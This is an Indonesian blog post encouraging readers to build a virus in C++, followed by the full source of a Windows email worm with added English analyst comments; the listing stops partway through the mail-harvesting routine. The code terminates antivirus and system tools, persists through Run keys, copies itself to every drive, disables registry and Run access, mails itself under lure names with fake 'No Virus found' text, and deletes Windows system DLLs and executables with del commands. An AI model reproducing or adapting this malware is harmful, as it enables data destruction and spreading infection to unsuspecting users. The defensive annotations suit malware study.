Situs Berbagi Ilmu dan Pengalaman

Jumat, 20 Desember 2013

Membuat VIRUS Dengan C++

Hello all ....
Membuat virus dengan Borland C++ sangat sulit dibanding kan menggunakan aplikasi2 pembuat virus yg sudah tersebar luas di pasaran, pembuatan virus dengan C++ menggunakan fuuulll listing berbeda dengan aplikasi vb vimaker "yang nanti akan saya post" yg tingal masukan nama virus terus setting sana-sini ..... tapi buat yang punya nyali tinggi dan suka maen listing program, pembuatan virus dengan C++ patut di coba ......

Let's making virus dude .... !!!


001
#include <windows.h>
002
#include <tlhelp32>
003
#include <fstream>
004
#include <mapi>
005
#include <memory>
006
#pragma argsused
007
/* mulai menulis nama anti virus dan update apa aja yg anda tau, apa aja yg ingin di matikan servisnya EXE ya.. lo..h, bisa di modif dan ditambahin sesuai kemauan. tidak ada peraturan dlm membuat virus */
008

009
/*
 * Analyst note: NULL-terminated list of process image names. WinMain walks
 * this list and hands every entry to Kill(), which terminates a running
 * process with that image name.
 * Besides antivirus, firewall and updater executables, the list names
 * built-in inspection and repair tools (TASKMGR, MSCONFIG.EXE, MSINFO32.EXE,
 * NETSTAT.EXE, SFC.EXE, TRACERT.EXE, DRWATSON.EXE), so the visible intent is
 * to impair both protection and manual investigation (MITRE ATT&CK T1562.001).
 * The last two entries are .pif names rather than security tools.
 * Detection: a single process requesting termination of many of these names
 * in a short burst is a strong tamper signal; products with self-protection
 * refuse such termination requests.
 */
const char *kill_av[]={ "AGENTSVR.EXE", "ANTI-TROJAN.EXE", "ANTIVIRUS.EXE", "ANTS.EXE",
010
 "APIMONITOR.EXE", "APLICA32.EXE", "APVXDWIN.EXE", "ATCON.EXE",
011
 "ATGUARD.EXE", "ATRO55EN.EXE", "ATUPDATER.EXE", "ATWATCH.EXE",
012
 "AUPDATE.EXE", "AUTODOWN.EXE", "AUTOTRACE.EXE", "AUTOUPDATE.EXE",
013
 "AVCONSOL.EXE", "AVGSERV9.EXE", "AVLTMAIN.EXE", "AVPUPD.EXE",
014
 "AVSYNMGR.EXE", "AVWUPD32.EXE", "AVXQUAR.EXE", "AVprotect9x.exe",
015
 "Au.exe", "BD_PROFESSIONAL.EXE", "BIDEF.EXE", "BIDSERVER.EXE",
016
 "BIPCP.EXE", "BIPCPEVALSETUP.EXE", "BISP.EXE", "BLACKD.EXE",
017
 "BLACKICE.EXE", "BOOTWARN.EXE", "BORG2.EXE", "BS120.EXE",
018
 "CCAPP.exe", "CDP.EXE", "CFGWIZ.EXE", "CFIADMIN.EXE", "CFIAUDIT.EXE",
019
 "CFINET.EXE", "CFINET32.EXE", "CLEAN.EXE", "CLEANER.EXE", "CLEANER3.EXE",
020
 "CLEANPC.EXE", "CMGRDIAN.EXE", "CMON016.EXE", "CPD.EXE", "CPF9X206.EXE",
021
 "CPFNT206.EXE", "CV.EXE", "CWNB181.EXE", "CWNTDWMO.EXE", "D3dupdate.exe",
022
 "DEFWATCH.EXE", "DEPUTY.EXE", "DPF.EXE", "DPFSETUP.EXE", "DRWATSON.EXE",
023
 "DRWEBUPW.EXE", "ENT.EXE", "ESCANH95.EXE", "ESCANHNT.EXE",
024
 "ESCANV95.EXE", "EXANTIVIRUS-CNET.EXE", "FAST.EXE", "FIREWALL.EXE",
025
 "FLOWPROTECTOR.EXE", "FP-WIN_TRIAL.EXE", "FRW.EXE", "FSAV.EXE",
026
 "FSAV530STBYB.EXE", "FSAV530WTBYB.EXE", "FSAV95.EXE", "GBMENU.EXE",
027
 "GBPOLL.EXE", "GUARD.EXE", "HACKTRACERSETUP.EXE", "HTLOG.EXE",
028
 "HWPE.EXE", "IAMAPP.EXE", "IAMSERV.EXE", "ICLOAD95.EXE",
029
 "ICLOADNT.EXE", "ICMON.EXE", "ICSSUPPNT.EXE", "ICSUPP95.EXE",
030
 "ICSUPPNT.EXE", "IFW2000.EXE", "IPARMOR.EXE", "IRIS.EXE",
031
 "JAMMER.EXE", "KAVLITE40ENG.EXE", "KAVPERS40ENG.EXE",
032
 "KERIO-PF-213-EN-WIN.EXE", "KERIO-WRL-421-EN-WIN.EXE",
033
 "KERIO-WRP-421-EN-WIN.EXE", "KILLPROCESSSETUP161.EXE",
034
 "LDPRO.EXE", "LOCALNET.EXE", "LOCKDOWN.EXE", "LOCKDOWN2000.EXE",
035
 "LSETUP.EXE", "LUALL.EXE", "LUCOMSERVER.EXE", "LUINIT.EXE",
036
 "MCAGENT.EXE", "MCUPDATE.EXE", "MFW2EN.EXE", "MFWENG3.02D30.EXE",
037
 "MGUI.EXE", "msconfig.exe", "MINILOG.EXE", "MOOLIVE.EXE", "MRFLUX.EXE",
038
 "MSCONFIG.EXE", "MSINFO32.EXE", "MSSMMC32.EXE", "MU0311AD.EXE",
039
 "NAV80TRY.EXE", "NAVAPW32.EXE", "NAVDX.EXE", "NAVSTUB.EXE",
040
 "NAVW32.EXE", "NC2000.EXE", "NCINST4.EXE", "NDD32.EXE",
041
 "NEOMONITOR.EXE", "NETARMOR.EXE", "NETINFO.EXE", "NETMON.EXE",
042
 "NETSCANPRO.EXE", "NETSPYHUNTER-1.2.EXE", "NETSTAT.EXE",
043
 "NISSERV.EXE", "NISUM.EXE", "NMAIN.EXE", "NORTON_INTERNET_SECU_3.0_407.EXE",
044
 "NPF40_TW_98_NT_ME_2K.EXE", "NPFMESSENGER.EXE", "NPROTECT.EXE",
045
 "NSCHED32.EXE", "NTVDM.EXE", "NUPGRADE.EXE", "NVARCH16.EXE",
046
 "NWINST4.EXE", "NWTOOL16.EXE", "OSTRONET.EXE", "OUTPOST.EXE",
047
 "OUTPOSTINSTALL.EXE", "OUTPOSTPROINSTALL.EXE", "PADMIN.EXE",
048
 "PANIXK.EXE", "PAVPROXY.EXE", "PCC2002S902.EXE", "PCC2K_76_1436.EXE",
049
 "PCCIOMON.EXE", "PCDSETUP.EXE", "PCFWALLICON.EXE", "PCIP10117_0.EXE",
050
 "PDSETUP.EXE", "PERISCOPE.EXE", "PERSFW.EXE", "PF2.EXE", "PFWADMIN.EXE",
051
 "PINGSCAN.EXE", "PLATIN.EXE", "POPROXY.EXE", "POPSCAN.EXE", "PORTDETECTIVE.EXE",
052
 "PPINUPDT.EXE", "PPTBC.EXE", "PPVSTOP.EXE", "PROCEXPLORERV1.0.EXE",
053
 "PROPORT.EXE", "PROTECTX.EXE", "PSPF.EXE", "PURGE.EXE", "PVIEW95.EXE",
054
 "QCONSOLE.EXE", "QSERVER.EXE", "RAV8WIN32ENG.EXE", "RESCUE.EXE",
055
 "RESCUE32.EXE", "RRGUARD.EXE", "RSHELL.EXE", "RTVSCN95.EXE",
056
 "RULAUNCH.EXE", "SAFEWEB.EXE", "SBSERV.EXE", "SD.EXE", "SETUPVAMEEVAL.EXE",
057
 "SETUP_FLOWPROTECTOR_US.EXE", "SFC.EXE", "SGSSFW32.EXE",
058
 "avserve2.exe", "SHELLSPYINSTALL.EXE", "SHN.EXE", "SMC.EXE",
059
 "SOFI.EXE", "SPF.EXE", "SPHINX.EXE", "SPYXX.EXE", "SS3EDIT.EXE",
060
 "ST2.EXE", "SUPFTRL.EXE", "SUPPORTER5.EXE", "SYMPROXYSVC.EXE",
061
 "SYSEDIT.EXE", "TASKMGR", "TASKMON.EXE", "TAUMON.EXE", "TAUSCAN.EXE",
062
 "TC.EXE", "TCA.EXE", "TCM.EXE", "TDS-3.EXE", "TDS2-98.EXE",
063
 "TDS2-NT.EXE", "TFAK5.EXE", "TGBOB.EXE", "TITANIN.EXE",
064
 "TITANINXP.EXE", "TRACERT.EXE", "TRJSCAN.EXE", "TRJSETUP.EXE",
065
 "TROJANTRAP3.EXE", "UNDOBOOT.EXE", "UPDATE.EXE", "VBCMSERV.EXE",
066
 "VBCONS.EXE", "VBUST.EXE", "VBWIN9X.EXE", "VBWINNTW.EXE",
067
 "VCSETUP.EXE", "VFSETUP.EXE", "VIRUSMDPERSONALFIREWALL.EXE",
068
 "VNLAN300.EXE", "VNPC3000.EXE", "VPC42.EXE", "VPFW30S.EXE",
069
 "VPTRAY.EXE", "VSCENU6.02D30.EXE", "VSECOMR.EXE", "VSHWIN32.EXE",
070
 "VSISETUP.EXE", "VSMAIN.EXE", "VSMON.EXE", "VSSTAT.EXE",
071
 "VSWIN9XE.EXE", "VSWINNTSE.EXE", "VSWINPERSE.EXE",
072
 "W32DSM89.EXE", "W9X.EXE", "WATCHDOG.EXE", "WEBSCANX.EXE",
073
 "WGFE95.EXE", "WHOSWATCHINGME.EXE", "WINRECON.EXE",
074
 "WNT.EXE", "WRADMIN.EXE", "WRCTRL.EXE", "WSBGATE.EXE",
075
 "WYVERNWORKSFIREWALL.EXE", "XPF202EN.EXE", "ZAPRO.EXE",
076
 "ZAPSETUP3001.EXE", "ZATUTOR.EXE", "ZAUINST.EXE", "ZONALM2601.EXE",
077
 "ZONEALARM.EXE","zlclient.exe", "lexplore.exe", "Drunk_lol.pif",
078
 "Webcam_004.pif", 0};
079

080
/*
 * Analyst note: NULL-terminated list of every drive letter a: to z:.
 * WinMain passes each entry to find_drives(), which checks the drive type
 * before copying the sample there.
 */
const char *drives[] = {"a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",
081
 "m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",
082
 "y:", "z:", 0};
083

084
/* Attachment display names: SendMail() assigns fileNames[counting] to the
   attachment's lpszFileName. Every name ends in .exe, so a mail gateway
   that blocks executable attachments stops this propagation path. */
085
char *fileNames[] = {"Message.exe", "Letter.exe", "Information.exe", "shadow_angel_lampung_underground.exe",
086
 "Documents.exe", "Attached_Message.exe", "Microsoft_Update.exe", "Private_Letter.exe",
087
 "Private_Document.exe", "Important_Message.exe"};
088

089
/* Subject lines used for the outgoing messages; findMail() passes
   subs[counting] to SendMail(). Most are reply-style ("Re: ...") or imitate
   an update notice, i.e. they are written to look like expected mail. */
091
char *subs[] = {"Re: Message", "Re: Letter", "Re: Information", "Warning of your mail ",
092
 "Re: Your Documents", "Re: Account Info", "Windows Update",
093
 "Re: My Letter", "Re: Docs", "Re: Your Email Info"};
094

095
/* Message bodies; findMail() passes texts[counting] to SendMail(). Each one
   claims that the attachment was scanned and found clean by a named antivirus
   vendor. The claim is plain text written by the sender and says nothing
   about the attachment. */
097
char *texts[] = {    "+++ Attachment: No Virus found  +++ MessageLabs AntiVirus - www.messagelabs.com",
098
 "+++ Attachment: No Virus found  +++ Bitdefender AntiVirus - www.bitdefender.com",
099
 "+++ Attachment: No Virus found  +++ MC-Afee AntiVirus -  www.mcafee.com",
100
 "+++ Attachment: No Virus found  +++ Kaspersky AntiVirus - www.kaspersky.com",
101
 "+++ Attachment: No Virus found  +++ Panda AntiVirus - www.pandasoftware.com",
102
 "+++ Attachment: No Virus found  ++++ Norton AntiVirus - www.symantec.de"};
103

104
/* Global state shared by the routines below. */
105
/* Receives the sample's own image path (filled in WinMain); it is the copy
   source used by WinMain and find_drives(). */
char path[MAX_PATH];
106
HMODULE GetModH = GetModuleHandle(NULL);
107
/* Handle of the Run key opened in WinMain. */
HKEY hKey;
108
int i = 0;
109
/* Simple MAPI message and originator structures filled by SendMail(). */
MapiMessage mes;
110
MapiRecipDesc from;
111
/* Own image path as obtained in WinMain; SendMail() attaches this file. */
char fileName[512];
112
/* Index into fileNames, subs and texts; seeded in WinMain and advanced in
   findMail(). */
unsigned short counting=0;
113
using namespace std;
114

115
void payload();
116
void GetDebugPriv();
117
void Kill(const char *kill_av);
118
int find_drives(const char *drives);
119
void no();
120
void findMail(char *);
121
void GetMail(char *, char *);
122
void SendMail(char *subject, char *sfrom,char *sto, char *smes);
123
void fastOut();
124

125
/* Function pointer that WinMain fills with the address of MAPISendMail
   resolved from MAPI32.DLL at run time, so the dependency does not appear
   in the import table. */
ULONG (PASCAL FAR *MSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
126

127
/*
 * Analyst summary of the sample's entry point. In the order visible below it:
 *   1. creates a console, hides its window and sleeps 60 s;
 *   2. calls GetDebugPriv() and uses a named mutex as a single-instance guard;
 *   3. calls Kill() for every entry of kill_av;
 *   4. copies its own image to three .pif files in the system and Windows
 *      directories and registers them as values of the HKLM Run key
 *      (persistence, MITRE ATT&CK T1547.001);
 *   5. calls no(), opens Internet Explorer and a hard-coded URL hidden, and
 *      after a further 60 s opens C:\WINDOWS\WinVBS.vbs;
 *   6. calls find_drives() for every entry of drives;
 *   7. loads MAPI32.DLL, resolves MAPISendMail and calls findMail() on ".",
 *      "\windows" and the folder read from the "Personal" shell-folder value;
 *   8. calls payload() and then stays in a Sleep loop.
 * Host indicators visible in this function: the mutex name, the three .pif
 * file names, the three Run value names and the WinVBS.vbs path.
 */
int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
128
{
129
 HWND hide;
130
 /* Allocate a console, then look the console window up by class name and
    hide it (nCmdShow 0), so nothing is shown to the user. */
 AllocConsole();
131
 hide = FindWindowA("ConsoleWindowClass", NULL);
132
 ShowWindow(hide, 0);
133

134
 /* One-minute delay before any further activity. */
 Sleep(60000);
135
 GetDebugPriv();
136
 /* Named mutex as single-instance guard: a second copy exits immediately.
    The mutex name is a stable host indicator for this sample. */
 CreateMutex(NULL, true, "-)(-=|L4r1$$4|=-)(-");
137
 if(GetLastError() == ERROR_ALREADY_EXISTS)
138
 {
139
 ExitProcess(0);
140
 }
141

142
 /* Request termination of every process named in kill_av. */
 for(i = 0; kill_av[i]; i++)
143
 {
144
 Kill(kill_av[i]);
145
 }
146

147
 char sys[MAX_PATH];
148
 char sys2[MAX_PATH];
149
 char windir[MAX_PATH];
150
 /* Resolve the sample's own path and build three destination paths: two in
    the system directory and one in the Windows directory. */
 GetModuleFileName(GetModH, path, sizeof(path));
151
 GetSystemDirectory(sys, sizeof(sys));
152
 GetSystemDirectory(sys2, sizeof(sys2));
153
 GetWindowsDirectory(windir, sizeof(windir));
154
 strcat(sys, "\\MSLARISSA.pif");
155
 strcat(sys2, "\\CmdPrompt32.pif");
156
 strcat(windir, "\\SP00Lsv32.pif");
157
 /* Self-copy to the three paths; the third argument false means an existing
    file is overwritten. */
 CopyFile(path, sys, false);
158
 CopyFile(path, sys2, false);
159
 CopyFile(path, windir, false);
160

161
 /* Persistence: the three copies are registered as values of the
    machine-wide Run key. Writing under HKEY_LOCAL_MACHINE normally needs
    administrative rights. Detection: new Run values that point to .pif
    files in system directories. */
 RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
162
 RegSetValueEx(hKey, "MSLARISSA", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));



163
 RegSetValueEx(hKey, "Command Prompt32", 0, REG_SZ,(const unsigned char*)sys2, sizeof(sys2));
164
 RegSetValueEx(hKey, "(L4r1$$4) (4nt1) (V1ruz)", 0, REG_SZ,(const unsigned char*)windir, sizeof(windir));
165
 RegCloseKey(hKey);
166

167
 /* Writes the policy-changing script C:\WINDOWS\WinVBS.vbs (see no()). */
 no();
168

169
 /* Starts Internet Explorer with a hidden window. */
170
 ShellExecute(NULL, "open", "IExplore.exe", NULL, NULL, SW_HIDE);
171

172
 /* Opens a hard-coded URL automatically, also requested hidden. */
173
 ShellExecute(NULL, "open", "http://www.spyrozone.net", NULL, NULL, SW_HIDE);
174

175
 Sleep(60000);
 /* Runs the script written by no() through its file association. */
176
 ShellExecute(NULL, "open", "C:\\WINDOWS\\WinVBS.vbs", NULL, NULL, SW_HIDE);
177

178
 /* Try every drive letter as a copy target (see find_drives()). */
 for(i =0; drives[i]; i++)
179
 {
180
 find_drives(drives[i]);
181
 }
182

183
 HINSTANCE MAPIlHnd;
184
 unsigned char buff[128];
185
 DWORD buffs = 128;
186
 HKEY keyHnd;
187
 char keyPath[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
188
 char keyItem[] = "Personal";
189

190
 /* Derive a starting index from the tick count and halve it until it is in
    the range 0..9; it selects the attachment name, subject and body. */
 counting = (unsigned short)GetTickCount();
191

192
 while(counting > 9)
193
 {
194
 counting = (unsigned short)(counting/2);
195
 }
196

197
 if(!GetModuleFileName(hInstance, fileName,512))
198
 {
199
 fastOut();
200
 }
201

202
 /* Simple MAPI is loaded and resolved at run time; on any failure the
    sample shows the decoy error box in fastOut() and exits. */
 MAPIlHnd = LoadLibraryA("MAPI32.DLL");
203

204
 if(!MAPIlHnd)
205
 {
206
 fastOut();
207
 }
208

209
 (FARPROC &)MSendMail = GetProcAddress(MAPIlHnd, "MAPISendMail");
210

211
 if(!MSendMail)
212
 {
213
 fastOut();
214
 }
215

216
 /* Harvest addresses from the current directory and from \windows. */
 findMail(".");
217
 findMail("\\windows");
218

219
 /* 0x80000001 is the numeric value of HKEY_CURRENT_USER. The "Personal"
    shell-folder value is read, a backslash and terminator are written at
    the end of the returned data, and that folder is searched as well. */
 if(RegOpenKeyEx((HKEY)0x80000001, keyPath, 0, KEY_READ, &keyHnd) == ERROR_SUCCESS)
220
 {
221
 if(ERROR_SUCCESS == RegQueryValueEx(keyHnd, keyItem, 0, 0, buff, &buffs))
222
 {
223
 buff[buffs-1] = '\\';
224
 buff[buffs] = 0;
225
 findMail((char *)buff);
226
 }
227
 }
228

229
 FreeLibrary(MAPIlHnd);
230

231
/*     1 juzt w4nn4 $4y... 1 l0v3 u ~!L4r1$$4!~     */
232

233
 /* Destructive stage, see payload(). */
 payload();
234

235
 /* Keeps the process resident by sleeping one minute per iteration; the
    statements after the loop run only if the loop ends. */
 for(i = 0; i < 9999999999999999999; i++)
236
 {
237
 Sleep(60000);
238
 }
239

240
 ShellExecute(NULL, "open", "MSLARISSA.pif", NULL, NULL, SW_HIDE);
241
 Sleep(10000);
242
 ShellExecute(NULL, "open", "CmdPrompt32.pif", NULL, NULL, SW_HIDE);
243
 Sleep(10000);
244
 ShellExecute(NULL, "open", "SP00Lsv32.pif", NULL, NULL, SW_HIDE);
245

246
 return 0;
247
}
248

249
/*Menulis pesan pada komputer yg terinfeksi,yahh.. sekedar pesan aja */
250
/*
 * Analyst note: destructive stage (MITRE ATT&CK T1485, Data Destruction).
 * Writes three text files to the root of C: (PESAN.txt, PESAN_KE_ANTIVIRUS.txt,
 * PESAN_KE_BROPIA.txt) and then issues six `del` commands through system()
 * against the .dll and .exe files in C:\WINDOWS\System32, C:\WINDOWS\System
 * and C:\WINDOWS.
 * The three file names are host indicators. Because system() runs each
 * command through the command interpreter, process-creation and command-line
 * logging records the `del` commands with this process as parent.
 * Whether the deletions succeed depends on the rights of the account and on
 * the file protection of the installed Windows version.
 */
void payload()
251
{
252
 /* Note left for the user of the infected machine. */
 ofstream sini;
253
 sini.open("C:\\PESAN.txt");
254
 sini.setf(ios_base::showpoint);
255
 sini<< "Komputer anda telah terinfeksi!" << endl;
256
 sini<< "kamu akan selamat," << endl;
257
 sini<< "Anda akan selamat untuk saat ini aja." << endl;
258
 sini<< "Tapi sistem komputer kamu akan rusak," << endl;
259
 sini<< "Kayaknya sih..." << endl;
260
 sini<< "Dibuat oleh," << endl;
261
 sini<< "Underground Lampung." << endl;
262
 sini<< "Hasta La Vista Bye.. Bye..," << endl;
263
 sini<< "   - SHADOW ANGEL : 7-20-07" << endl;
264
 sini.close();
265

266
 /* Note addressed to antivirus vendors. */
 ofstream msg_av;
267
 msg_av.open("C:\\PESAN_KE_ANTIVIRUS.txt");
268
 msg_av.setf(ios_base::showpoint);
269
 msg_av << "Salam anti virus!" << endl;
270
 msg_av << "Saya ingin membuat industri anti virus <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_smile.gif" alt=":-)" class="wp-smiley"> " << endl;
271
 msg_av << "  ----------------------------------------  " << endl;
272
 msg_av << "       - SHADOW ANGEL: 7-20-07" << endl;
273
 msg_av.close();
274

275
 /* Note addressed to the author of another worm family. */
 ofstream bropia_msg;
276
 bropia_msg.open("C:\\PESAN_KE_BROPIA.txt");
277
 bropia_msg.setf(ios_base::showpoint);
278
 bropia_msg << "Halo Bropia.. berhenti membuat worm MSN itu merupakan pekerjaan bodoh..." << endl;
279
 bropia_msg << "... lol -- Shadow Angel Anti Bropia... -- Selamatkan dunia dari  BROPIA!!!" << endl;
280
 bropia_msg << "                    - SHADOW ANGEL : 7-20-07" << endl;
281
 bropia_msg.close();
282

283
 /* Deletion of system binaries via the command interpreter. */
 system("del C:\\WINDOWS\\System32\\*.dll");
284
 system("del C:\\WINDOWS\\System32\\*.exe");
285
 system("del C:\\WINDOWS\\System\\*.dll");
286
 system("del C:\\WINDOWS\\System\\*.exe");
287
 system("del C:\\WINDOWS\\*.dll");
288
 system("del C:\\WINDOWS\\*.exe");
289
}
290

291
/*
 * Analyst note: terminates a running process whose image name equals the
 * string passed in (the parameter shadows the global kill_av array).
 * It takes a Toolhelp process snapshot, walks the entries, opens each process
 * with PROCESS_TERMINATE access and calls TerminateProcess() on the one whose
 * szExeFile matches. The comparison is an exact, case-sensitive strcmp().
 * Defensive view (MITRE ATT&CK T1562.001): repeated OpenProcess requests for
 * terminate access against security products are what endpoint tamper
 * protection and process-access auditing are meant to catch.
 */
void Kill(const char *kill_av)
292
{
293
 HANDLE laris;
294
 PROCESSENTRY32 process;
295
 process.dwSize = sizeof(PROCESSENTRY32);
296
 /* Snapshot of all processes on the system. */
 void* photo = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
297
 Process32First(photo, &process);
298
 while(photo != NULL)
299
 {
300
 Process32Next(photo, &process);
301
 /* Terminate access is requested for every enumerated process, not only
    for the matching one. */
 laris = OpenProcess(PROCESS_TERMINATE, false, process.th32ProcessID);
302
 if(!strcmp(process.szExeFile, kill_av))
303
 {
304
 TerminateProcess(laris, 0);
305
 CloseHandle(laris);
306
 break;
307
 }
308
 /* End of the snapshot: stop walking. */
 if(GetLastError() == ERROR_NO_MORE_FILES)
309
 {
310
 break;
311
 }
312
 CloseHandle(laris);
313
 }
314
}
315

316
/*
 * Analyst note: enables SeDebugPrivilege (SE_DEBUG_NAME) on the token of the
 * current process. It opens the process token, looks up the privilege LUID
 * and calls AdjustTokenPrivileges() with SE_PRIVILEGE_ENABLED; it returns
 * early if the token cannot be opened or the privilege cannot be looked up.
 * AdjustTokenPrivileges() can only enable a privilege the account already
 * holds, so this has an effect only when the sample runs with an account
 * that has the debug privilege (by default, administrators). Running users
 * without administrative rights removes that precondition.
 * Detection: a non-debugger process enabling SeDebugPrivilege; where token
 * right adjustment auditing is enabled, Windows records it as event 4703.
 */
void GetDebugPriv()
317
{
318
 HANDLE hToken;
319
 LUID DebugVal;
320
 TOKEN_PRIVILEGES tp;
321
 if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
322
 {
323
 return;
324
 }
325
 if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&DebugVal))
326
 {
327
 CloseHandle(hToken);
328
 return;
329
 }
330
 /* One privilege entry: the debug privilege, marked enabled. */
 tp.PrivilegeCount = 1;
331
 tp.Privileges[0].Luid = DebugVal;
332
 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
333
 AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
334
 CloseHandle(hToken);
335
}
336

337
/* Mulai menginveksi perangkat  USB */
338
/*
 * Analyst note: copies the sample (global `path`) to
 * <drive>\PUISI_CINTA.pif when GetDriveType() reports the drive as removable,
 * fixed or remote; the three branches are identical apart from the type
 * tested. The parameter shadows the global drives array. CopyFile() is called
 * with bFailIfExists = true, so an existing file of that name is not
 * overwritten. The function returns 0 in every case.
 * Defensive view (MITRE ATT&CK T1091 for the removable-media case): the file
 * name PUISI_CINTA.pif in a drive root is a host indicator; .pif files are
 * launched as programs by Windows, so they belong on attachment and
 * removable-media block lists together with .exe.
 */
int find_drives(const char *drives)
339
{
340
 char dir[MAX_PATH];
341
 UINT dr_type = GetDriveType(drives);
342

343
 /* Removable media such as USB sticks. */
 if(dr_type == DRIVE_REMOVABLE)
344
 {
345
 strcpy(dir, drives);
346
 strcat(dir, "\\");
347
 strcat(dir, "PUISI_CINTA.pif");
348
 CopyFile(path, dir, true);
349
 return 0;
350
 }
 /* Local fixed disks. */
351
 if(dr_type == DRIVE_FIXED)
352
 {
353
 strcpy(dir, drives);
354
 strcat(dir, "\\");
355
 strcat(dir, "PUISI_CINTA.pif");
356
 CopyFile(path, dir, true);
357
 return 0;
358
 }
 /* Mapped network drives. */
359
 if(dr_type == DRIVE_REMOTE)
360
 {
361
 strcpy(dir, drives);
362
 strcat(dir, "\\");
363
 strcat(dir, "PUISI_CINTA.pif");
364
 CopyFile(path, dir, true);
365
 return 0;
366
 }
367
 return 0;
368
}
369

370
/*
 * Analyst note: writes the VBScript file C:\WINDOWS\WinVBS.vbs. The script
 * consists of five Wscript.shell regwrite calls that set REG_DWORD policy
 * values under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
 * Policies: Explorer\NoRun = 1, System\DisableRegistryTools = 1,
 * Explorer\NoDrives = 67108863 (2^26 - 1, one bit per drive letter),
 * WinOldApp\Disabled = 1 and System\NoAdminPage = 1.
 * The script is not run here; WinMain opens it later with ShellExecute().
 * Defensive view (MITRE ATT&CK T1112): these values restrict the tools a
 * user would reach for during clean-up, so their presence is both an
 * indicator and something remediation has to reset. The script path is a
 * host indicator as well.
 */
void no()
371
{
372
 ofstream nono;
373
 nono.open("C:\\WINDOWS\\WinVBS.vbs");
374
 nono.setf(ios_base::showpoint);
375
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\", 1, \"REG_DWORD\"" << endl;
376
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools\", 1, \"REG_DWORD\"" << endl;



377
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\", 67108863, \"REG_DWORD\"" << endl;
378
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled\", 1, \"REG_DWORD\"" << endl;
379
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoAdminPage\", 1, \"REG_DWORD\"" << endl;
380
 nono.close();




381
}
382

383
/*
 * Analyst note: shared failure exit. Shows a message box titled
 * "System Error" with a generic memory-error text and ends the process with
 * exit code -1. The text is unrelated to the actual failure (the callers
 * use it when a path lookup, the MAPI load or an allocation fails), so to
 * the user it looks like an ordinary application crash.
 */
void fastOut()
384
{
385
 MessageBox(NULL, "Invalid memory adress:\n\nProgram terminating.", "System Error", MB_OK | MB_ICONERROR);
386
 exit(-1);
387
}
388

389
/*
 * Analyst note: sends one message through Simple MAPI using the function
 * pointer MSendMail (resolved to MAPISendMail in WinMain).
 *   subject - subject line
 *   sfrom   - display name placed in the originator descriptor
 *   sto     - recipient address
 *   smes    - message body text
 * The message carries one attachment: the file at the global fileName (the
 * sample's own image) presented under fileNames[counting]. The call passes
 * MAPI_LOGON_UI and no session handle, so it goes through the mail client
 * profile of the logged-on user.
 * Defensive view: mail is submitted by a process that is not the mail
 * client; programmatic-send prompts in the mail client and attachment
 * filtering of executables at the gateway both interrupt this path.
 */
void SendMail(char *subject, char *sfrom, char *sto, char *smes)
390
{
391
 memset(&mes, 0, sizeof(MapiMessage));
392
 memset(&from, 0, sizeof(MapiRecipDesc));
393
 from.lpszName = sfrom;
394
 from.ulRecipClass = MAPI_ORIG;
395
 mes.lpszSubject = subject;
396
 mes.lpRecips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
397

398
 if(!mes.lpRecips)
399
 {
400
 fastOut();
401
 }
402

403
 /* Single "To" recipient. */
 memset(mes.lpRecips, 0, sizeof(MapiRecipDesc));
404
 mes.lpRecips->lpszName = sto;
405
 mes.lpRecips->ulRecipClass = MAPI_TO;
406
 mes.nRecipCount = 1;
407
 mes.lpFiles = (MapiFileDesc *)malloc(sizeof(MapiFileDesc));
408

409
 if(!mes.lpFiles)
410
 {
411
 fastOut();
412
 }
413

414
 /* Single attachment: real path is the sample itself, shown under a
    lure name. */
 memset(mes.lpFiles, 0, sizeof(MapiFileDesc));
415
 mes.lpFiles->lpszPathName = fileName;
416
 mes.lpFiles->lpszFileName = fileNames[counting];
417
 mes.nFileCount = 1;
418
 mes.lpOriginator = &from;
419
 mes.lpszNoteText = smes;
420
 (MSendMail)(0, 0, &mes, MAPI_LOGON_UI, 0);
421
 free(mes.lpRecips);
422
 free(mes.lpFiles);
423
}
424

425
/*
 * Analyst note: address-harvesting driver. Searches the directory `wild`
 * for files matching the pattern *.ht* (for example .htm and .html), passes
 * each file to GetMail(), and when an address comes back calls SendMail()
 * with subs[counting] and texts[counting]. `counting` is advanced after each
 * send and wraps to 0 at 10.
 * Defensive view: the observable behaviour is a non-browser process reading
 * many local HTML files and then driving the mail client through MAPI.
 */
void findMail(char *wild)
426
{
427
 HANDLE fh;
428
 WIN32_FIND_DATA fdata;
429
 char mail[128];
430
 char buff[512];
431
 wsprintf(buff, "%s\\*.ht*", wild);
432
 fh = FindFirstFile(buff, &fdata);
433
 if(fh == INVALID_HANDLE_VALUE)
434
 {
435
 return;
436
 }
437
 while(1)
438
 {
439
